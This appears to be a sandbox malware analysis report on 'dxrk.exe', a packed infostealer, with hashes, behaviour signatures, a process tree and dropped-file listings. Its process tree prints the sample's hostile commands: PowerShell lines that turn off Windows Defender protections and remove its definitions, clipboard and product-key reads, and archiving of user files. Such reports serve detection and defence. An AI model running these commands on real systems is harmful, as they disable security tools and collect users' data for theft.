Analysis
-
max time kernel
445s -
max time network
1169s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
01-06-2024 19:29
General
-
Target
dxrk.exe
-
Size
6.9MB
-
MD5
0438f9feb601e4d2a3fb2687b160b90a
-
SHA1
f37a4db22d9b58844fc0fc1753e0201861267f21
-
SHA256
45aba51b06cd23a18801950943cf12bd32c9ee8f3d8cd804a9802513f879a473
-
SHA512
e406b95a411579685fdf336aeb14ed3bfd85328f76d3d34924fca8a76e69aa3e637c2d5574a1206b349cffda3058ee350ee4abbd3ef5c09d7f7e488c5535c0fd
-
SSDEEP
98304:vrUcDjWM8JEE1rytamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRGYKJJcGhEY:vrUc0peNTfm/pf+xk4dWRGtrbWOjgWyK
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 2848 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
dxrk.exepid process 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe 4496 dxrk.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI17882\python311.dll upx behavioral1/memory/4496-25-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI17882\libcrypto-1_1.dll upx behavioral1/memory/4496-48-0x00007FFBEE1E0000-0x00007FFBEE1EF000-memory.dmp upx behavioral1/memory/4496-47-0x00007FFBEBCA0000-0x00007FFBEBCC4000-memory.dmp upx behavioral1/memory/4496-54-0x00007FFBEBC70000-0x00007FFBEBC9D000-memory.dmp upx behavioral1/memory/4496-58-0x00007FFBEBC40000-0x00007FFBEBC63000-memory.dmp upx behavioral1/memory/4496-57-0x00007FFBEE110000-0x00007FFBEE129000-memory.dmp upx behavioral1/memory/4496-60-0x00007FFBE86B0000-0x00007FFBE8823000-memory.dmp upx behavioral1/memory/4496-64-0x00007FFBEE1D0000-0x00007FFBEE1DD000-memory.dmp upx behavioral1/memory/4496-63-0x00007FFBECCE0000-0x00007FFBECCF9000-memory.dmp upx behavioral1/memory/4496-66-0x00007FFBE8990000-0x00007FFBE89BE000-memory.dmp upx behavioral1/memory/4496-70-0x00007FFBE7D70000-0x00007FFBE7E28000-memory.dmp upx behavioral1/memory/4496-71-0x00007FFBD72E0000-0x00007FFBD7655000-memory.dmp upx behavioral1/memory/4496-79-0x00007FFBECDD0000-0x00007FFBECDDD000-memory.dmp upx behavioral1/memory/4496-78-0x00007FFBE7C50000-0x00007FFBE7D6C000-memory.dmp upx behavioral1/memory/4496-77-0x00007FFBE88B0000-0x00007FFBE88C4000-memory.dmp upx behavioral1/memory/4496-76-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmp upx behavioral1/memory/4496-194-0x00007FFBEBCA0000-0x00007FFBEBCC4000-memory.dmp upx behavioral1/memory/4496-246-0x00007FFBE86B0000-0x00007FFBE8823000-memory.dmp upx behavioral1/memory/4496-255-0x00007FFBEBC40000-0x00007FFBEBC63000-memory.dmp upx behavioral1/memory/4496-254-0x00007FFBE7C50000-0x00007FFBE7D6C000-memory.dmp upx behavioral1/memory/4496-251-0x00007FFBD72E0000-0x00007FFBD7655000-memory.dmp upx behavioral1/memory/4496-250-0x00007FFBE7D70000-0x00007FFBE7E28000-memory.dmp upx behavioral1/memory/4496-249-0x00007FFBE8990000-0x00007FFBE89BE000-memory.dmp upx behavioral1/memory/4496-247-0x00007FFBECCE0000-0x00007FFBECCF9000-memory.dmp upx behavioral1/memory/4496-240-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmp upx behavioral1/memory/4496-241-0x00007FFBEBCA0000-0x00007FFBEBCC4000-memory.dmp upx behavioral1/memory/4496-256-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmp upx behavioral1/memory/4496-272-0x00007FFBE7E30000-0x00007FFBE8418000-memory.dmp upx behavioral1/memory/4496-292-0x00007FFBECDD0000-0x00007FFBECDDD000-memory.dmp upx behavioral1/memory/4496-300-0x00007FFBE7C50000-0x00007FFBE7D6C000-memory.dmp upx behavioral1/memory/4496-299-0x00007FFBE88B0000-0x00007FFBE88C4000-memory.dmp upx behavioral1/memory/4496-298-0x00007FFBD72E0000-0x00007FFBD7655000-memory.dmp upx behavioral1/memory/4496-297-0x00007FFBE7D70000-0x00007FFBE7E28000-memory.dmp upx behavioral1/memory/4496-296-0x00007FFBE8990000-0x00007FFBE89BE000-memory.dmp upx behavioral1/memory/4496-295-0x00007FFBEE1D0000-0x00007FFBEE1DD000-memory.dmp upx behavioral1/memory/4496-294-0x00007FFBECCE0000-0x00007FFBECCF9000-memory.dmp upx behavioral1/memory/4496-293-0x00007FFBE86B0000-0x00007FFBE8823000-memory.dmp upx behavioral1/memory/4496-291-0x00007FFBEE110000-0x00007FFBEE129000-memory.dmp upx behavioral1/memory/4496-290-0x00007FFBEBC70000-0x00007FFBEBC9D000-memory.dmp upx behavioral1/memory/4496-289-0x00007FFBEE1E0000-0x00007FFBEE1EF000-memory.dmp upx behavioral1/memory/4496-288-0x00007FFBEBCA0000-0x00007FFBEBCC4000-memory.dmp upx behavioral1/memory/4496-287-0x00007FFBEBC40000-0x00007FFBEBC63000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 844 WMIC.exe 3668 WMIC.exe 5016 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 3772 tasklist.exe 764 tasklist.exe 2548 tasklist.exe 1992 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2320 powershell.exe 424 powershell.exe 424 powershell.exe 2320 powershell.exe 2624 powershell.exe 2624 powershell.exe 3012 powershell.exe 3012 powershell.exe 3372 powershell.exe 3372 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exepowershell.exeWMIC.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2548 tasklist.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeIncreaseQuotaPrivilege 4932 WMIC.exe Token: SeSecurityPrivilege 4932 WMIC.exe Token: SeTakeOwnershipPrivilege 4932 WMIC.exe Token: SeLoadDriverPrivilege 4932 WMIC.exe Token: SeSystemProfilePrivilege 4932 WMIC.exe Token: SeSystemtimePrivilege 4932 WMIC.exe Token: SeProfSingleProcessPrivilege 4932 WMIC.exe Token: SeIncBasePriorityPrivilege 4932 WMIC.exe Token: SeCreatePagefilePrivilege 4932 WMIC.exe Token: SeBackupPrivilege 4932 WMIC.exe Token: SeRestorePrivilege 4932 WMIC.exe Token: SeShutdownPrivilege 4932 WMIC.exe Token: SeDebugPrivilege 4932 WMIC.exe Token: SeSystemEnvironmentPrivilege 4932 WMIC.exe Token: SeRemoteShutdownPrivilege 4932 WMIC.exe Token: SeUndockPrivilege 4932 WMIC.exe Token: SeManageVolumePrivilege 4932 WMIC.exe Token: 33 4932 WMIC.exe Token: 34 4932 WMIC.exe Token: 35 4932 WMIC.exe Token: 36 4932 WMIC.exe Token: SeDebugPrivilege 424 powershell.exe Token: SeIncreaseQuotaPrivilege 4932 WMIC.exe Token: SeSecurityPrivilege 4932 WMIC.exe Token: SeTakeOwnershipPrivilege 4932 WMIC.exe Token: SeLoadDriverPrivilege 4932 WMIC.exe Token: SeSystemProfilePrivilege 4932 WMIC.exe Token: SeSystemtimePrivilege 4932 WMIC.exe Token: SeProfSingleProcessPrivilege 4932 WMIC.exe Token: SeIncBasePriorityPrivilege 4932 WMIC.exe Token: SeCreatePagefilePrivilege 4932 WMIC.exe Token: SeBackupPrivilege 4932 WMIC.exe Token: SeRestorePrivilege 4932 WMIC.exe Token: SeShutdownPrivilege 4932 WMIC.exe Token: SeDebugPrivilege 4932 WMIC.exe Token: SeSystemEnvironmentPrivilege 4932 WMIC.exe Token: SeRemoteShutdownPrivilege 4932 WMIC.exe Token: SeUndockPrivilege 4932 WMIC.exe Token: SeManageVolumePrivilege 4932 WMIC.exe Token: 33 4932 WMIC.exe Token: 34 4932 WMIC.exe Token: 35 4932 WMIC.exe Token: 36 4932 WMIC.exe Token: SeIncreaseQuotaPrivilege 3668 WMIC.exe Token: SeSecurityPrivilege 3668 WMIC.exe Token: SeTakeOwnershipPrivilege 3668 WMIC.exe Token: SeLoadDriverPrivilege 3668 WMIC.exe Token: SeSystemProfilePrivilege 3668 WMIC.exe Token: SeSystemtimePrivilege 3668 WMIC.exe Token: SeProfSingleProcessPrivilege 3668 WMIC.exe Token: SeIncBasePriorityPrivilege 3668 WMIC.exe Token: SeCreatePagefilePrivilege 3668 WMIC.exe Token: SeBackupPrivilege 3668 WMIC.exe Token: SeRestorePrivilege 3668 WMIC.exe Token: SeShutdownPrivilege 3668 WMIC.exe Token: SeDebugPrivilege 3668 WMIC.exe Token: SeSystemEnvironmentPrivilege 3668 WMIC.exe Token: SeRemoteShutdownPrivilege 3668 WMIC.exe Token: SeUndockPrivilege 3668 WMIC.exe Token: SeManageVolumePrivilege 3668 WMIC.exe Token: 33 3668 WMIC.exe Token: 34 3668 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
dxrk.exedxrk.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1788 wrote to memory of 4496 1788 dxrk.exe dxrk.exe PID 1788 wrote to memory of 4496 1788 dxrk.exe dxrk.exe PID 4496 wrote to memory of 4832 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 4832 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3396 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3396 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 408 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 408 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3588 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3588 4496 dxrk.exe cmd.exe PID 408 wrote to memory of 2548 408 cmd.exe tasklist.exe PID 408 wrote to memory of 2548 408 cmd.exe tasklist.exe PID 3396 wrote to memory of 2320 3396 cmd.exe powershell.exe PID 3396 wrote to memory of 2320 3396 cmd.exe powershell.exe PID 4832 wrote to memory of 424 4832 cmd.exe powershell.exe PID 4832 wrote to memory of 424 4832 cmd.exe powershell.exe PID 3588 wrote to memory of 4932 3588 cmd.exe WMIC.exe PID 3588 wrote to memory of 4932 3588 cmd.exe WMIC.exe PID 4496 wrote to memory of 3580 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3580 4496 dxrk.exe cmd.exe PID 3580 wrote to memory of 1680 3580 cmd.exe reg.exe PID 3580 wrote to memory of 1680 3580 cmd.exe reg.exe PID 4496 wrote to memory of 4900 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 4900 4496 dxrk.exe cmd.exe PID 4900 wrote to memory of 944 4900 cmd.exe reg.exe PID 4900 wrote to memory of 944 4900 cmd.exe reg.exe PID 4496 wrote to memory of 4564 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 4564 4496 dxrk.exe cmd.exe PID 4564 wrote to memory of 3668 4564 cmd.exe WMIC.exe PID 4564 wrote to memory of 3668 4564 cmd.exe WMIC.exe PID 4496 wrote to memory of 3548 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3548 4496 dxrk.exe cmd.exe PID 3548 wrote to memory of 5016 3548 cmd.exe WMIC.exe PID 3548 wrote to memory of 5016 3548 cmd.exe WMIC.exe PID 4496 wrote to memory of 4412 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 4412 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3644 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3644 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3592 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3592 4496 dxrk.exe cmd.exe PID 4412 wrote to memory of 1992 4412 cmd.exe tasklist.exe PID 4412 wrote to memory of 1992 4412 cmd.exe tasklist.exe PID 3644 wrote to memory of 3772 3644 cmd.exe tasklist.exe PID 3644 wrote to memory of 3772 3644 cmd.exe tasklist.exe PID 3592 wrote to memory of 1008 3592 cmd.exe WMIC.exe PID 3592 wrote to memory of 1008 3592 cmd.exe WMIC.exe PID 4496 wrote to memory of 1800 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 1800 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 4376 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 4376 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3008 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 3008 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 1192 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 1192 4496 dxrk.exe cmd.exe PID 3008 wrote to memory of 1264 3008 cmd.exe tree.com PID 3008 wrote to memory of 1264 3008 cmd.exe tree.com PID 1800 wrote to memory of 2624 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 2624 1800 cmd.exe powershell.exe PID 4376 wrote to memory of 764 4376 cmd.exe tasklist.exe PID 4376 wrote to memory of 764 4376 cmd.exe tasklist.exe PID 1192 wrote to memory of 4824 1192 cmd.exe systeminfo.exe PID 1192 wrote to memory of 4824 1192 cmd.exe systeminfo.exe PID 4496 wrote to memory of 4640 4496 dxrk.exe cmd.exe PID 4496 wrote to memory of 4640 4496 dxrk.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\dxrk.exe"C:\Users\Admin\AppData\Local\Temp\dxrk.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\dxrk.exe"C:\Users\Admin\AppData\Local\Temp\dxrk.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dxrk.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dxrk.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4932 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:1680
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:944
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3668 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:5016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3772 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:1008
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2624 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:764 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1264
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4640
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4140
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2896
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4784
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1940
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4072
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2316
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:736
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4340
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:1640
-
C:\Windows\system32\getmac.exegetmac4⤵PID:1872
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"ud" "C:\Users\Admin\AppData\Local\Temp\GXax3.zip" *"3⤵PID:452
-
C:\Users\Admin\AppData\Local\Temp\_MEI17882\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"ud" "C:\Users\Admin\AppData\Local\Temp\GXax3.zip" *4⤵
- Executes dropped EXE
PID:2848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:4068
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:4700
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:4912
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:1824
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:2116
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:4364
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3012 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3936
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:844 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:2844
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3372
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
C:\Users\Admin\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dllFilesize
96KB
MD5f12681a472b9dd04a812e16096514974
SHA16fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA5127d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2
-
C:\Users\Admin\AppData\Local\Temp\_MEI17882\_bz2.pydFilesize
46KB
MD50c13627f114f346604b0e8cbc03baf29
SHA1bf77611d924df2c80aabcc3f70520d78408587a2
SHA256df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861
SHA512c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334
-
C:\Users\Admin\AppData\Local\Temp\_MEI17882\_ctypes.pydFilesize
57KB
MD538fb83bd4febed211bd25e19e1cae555
SHA14541df6b69d0d52687edb12a878ae2cd44f82db6
SHA256cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65
SHA512f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931
-
C:\Users\Admin\AppData\Local\Temp\_MEI17882\_decimal.pydFilesize
104KB
MD57ba541defe3739a888be466c999c9787
SHA1ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac
SHA256f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29
SHA5129194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b
-
C:\Users\Admin\AppData\Local\Temp\_MEI17882\_hashlib.pydFilesize
33KB
MD5596df8ada4b8bc4ae2c2e5bbb41a6c2e
SHA1e814c2e2e874961a18d420c49d34b03c2b87d068
SHA25654348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec
SHA512e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e
-
C:\Users\Admin\AppData\Local\Temp\_MEI17882\_lzma.pydFilesize
84KB
MD58d9e1bb65a192c8446155a723c23d4c5
SHA1ea02b1bf175b7ef89ba092720b3daa0c11bef0f0
SHA2561549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7
SHA5124d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf
-
C:\Users\Admin\AppData\Local\Temp\_MEI17882\_queue.pydFilesize
24KB
MD5fbbbfbcdcf0a7c1611e27f4b3b71079e
SHA156888df9701f9faa86c03168adcd269192887b7b
SHA256699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163
SHA5120a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284
-
C:\Users\Admin\AppData\Local\Temp\_MEI17882\_socket.pydFilesize
41KB
MD54351d7086e5221398b5b78906f4e84ac
